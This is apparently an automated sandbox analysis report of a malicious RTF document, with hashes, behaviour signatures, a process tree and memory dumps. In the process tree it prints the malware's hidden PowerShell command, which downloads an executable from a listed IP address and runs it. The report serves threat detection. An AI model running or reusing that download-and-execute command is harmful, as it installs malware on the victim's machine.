894bd85e8489f2ceeb14a9cd0c0b028d9749db622ad3bc68ccfc33323a92bd17

General

Target

SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
Size

97KB
MD5

340e15c9ee5ae17758bb2e4a7890c0c0
SHA1

7bd2df48ad16fe08db23700ab57e781048f9bc76
SHA256

894bd85e8489f2ceeb14a9cd0c0b028d9749db622ad3bc68ccfc33323a92bd17
SHA512

b93846e9dffea0449e4a1f441aa4956da9220c41d2564838e0ac95c4a0a6878dfdf0163087a42834e2edd59751c9097e3bd0834d06405060db3a1ab68a33ada6

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://185.208.211.67/scorp/Class.sfx.exe

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

740 WINWORD.EXE
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

WINWORD.EXEEXCEL.EXE

pid process

740 WINWORD.EXE
740 WINWORD.EXE
1048 EXCEL.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1800 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1800 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

WINWORD.EXE

pid process

740 WINWORD.EXE
740 WINWORD.EXE

pid	process
740	WINWORD.EXE

pid	process
740	WINWORD.EXE
740	WINWORD.EXE
1048	EXCEL.EXE

description	pid	process
Token: SeDebugPrivilege	1800	powershell.exe

pid	process
1800	powershell.exe

pid	process
740	WINWORD.EXE
740	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1800	1048	powershell.exe	EXCEL.EXE

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

EXCEL.EXE

description	pid	process	target process
PID 1048 wrote to memory of 1800	1048	EXCEL.EXE	powershell.exe
PID 1048 wrote to memory of 1800	1048	EXCEL.EXE	powershell.exe
PID 1048 wrote to memory of 1800	1048	EXCEL.EXE	powershell.exe

Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1800 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

powershell.exe

pid process

1800 powershell.exe
Office loads VBA resources, possible macro or embedded object present

flow	pid	process
4	1800	powershell.exe

pid	process
1800	powershell.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:740

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://185.208.211.67/scorp/Class.sfx.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\newfile.Exe')
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: GetForegroundWindowSpam
PID:1800

C:\Program Files\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
PID:1888

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/740-5-0x00000000024D0000-0x00000000024D4000-memory.dmp

Filesize
16KB

Download
memory/740-6-0x0000000007030000-0x0000000007034000-memory.dmp

Filesize
16KB

Download
memory/1048-1-0x0000000005AD0000-0x0000000005BD0000-memory.dmp

Filesize
1024KB

Download
memory/1048-0-0x0000000005AD0000-0x0000000005BD0000-memory.dmp

Filesize
1024KB

Download
memory/1048-3-0x0000000007670000-0x0000000007674000-memory.dmp

Filesize
16KB

Download
memory/1048-4-0x0000000006670000-0x0000000006674000-memory.dmp

Filesize
16KB

Download
memory/1800-2-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing